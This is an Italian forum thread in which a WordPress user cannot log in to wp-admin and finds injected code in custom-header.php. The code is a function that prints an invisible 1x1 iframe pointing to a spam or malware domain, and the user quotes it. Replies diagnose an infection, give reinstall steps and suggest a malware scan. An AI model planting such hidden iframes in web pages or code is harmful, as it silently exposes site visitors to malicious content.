- Home
- Categorie
- Coding e Sistemistica
- CMS & Piattaforme Self-Hosted
- Impossibile accedere a wp-admin
-
Impossibile accedere a wp-admin
Salve, non entravo nella pagina amministratore del mio sito da una settimana. Stamattina ho provato ma la pagina dove inserire il login mi da questo errore
Parse error: syntax error, unexpected $end in ..... wp-admin/custom-header.php on line 269
Ho** controllato la riga 269 di custom-header.php ed è vuota. L'ultima riga valida è la 268 dove c'è questo testo
**function js_1() { ?> <!-- . --><iframe src=".....freemoney.bigmoney.biz/index.php" width='1' height='1' frameborder='0'></iframe><!-- . -->Mi sapete dare qualche indicazione?
-
Mi sa che sei stato attaccato da un malware, difficile pensare che dentro il core di wordpress ci sia un iframe a freemoney, comunque nell'ultima versione di wordpress quel file ha 1053 righe
-
@elmanisero said:
Mi sa che sei stato attaccato da un malware, difficile pensare che dentro il core di wordpress ci sia un iframe a freemoney, comunque nell'ultima versione di wordpress quel file ha 1053 righe
Ho una versione un po' vecchia di wordpress. Ma se ci istallo sopra quella nuova pensi che potrei risolvere il problema?
-
Forse temporaneamente, poi devi trovare il virus ed eliminarlo.
Per installare la nuova versione segui questa guida anche se certi passaggi non li potrai fare visto che non riesci a loggarti1° backup del database
2° backup del sito
3° disattiva tutti i plugin e attiva il tema di default
4° Cancella tutto tranne i file wp.config e .htaccess e la cartella wp-content con le sue sotto-cartelle
5° Nella cartella languages dentro wp-content cancella tutti i file
6° Carica la nuova versione di wp e quando ti chiede di sovrascrivere la cartella wp-content gli dici di si.Loggati al sito, gli fai fare l'aggiornamento del database che ti chiede di fare, attiva il tema che avevi, verifica che funzioni e successivamente attivi uno alla volta i plugin sempre verificando che non diano problemi.
-
Non posso disattivare i plugin perché non posso accedere all'area riservata. Se non lo faccio che succede?
-
Il passaggio 3 lo puoi attuare in questo modo, dopo aver fatto un backup del sito cancelli tutti i plugin tranne quelli di default.
I plugin se attivati e non compatibili con la nuova versione potrebbero invalidare il processo di aggiornamento.
Per i temi il discorso è analogo ma è difficile che un tema non sia compatibile quindi non ti consiglio di cancellare il tema che hai in uso.
-
Provo e vediamo che succede.
-
Aggiornato. E' stato più facile del previsto, ora funziona tutto e meglio!
Grazie mille.
-
Prova sottoporre il sito ad una scansione con http://sitecheck.sucuri.net/scanner/ per essere sicuro che non ci sono virus altrimenti ti ricapita la stessa cosa.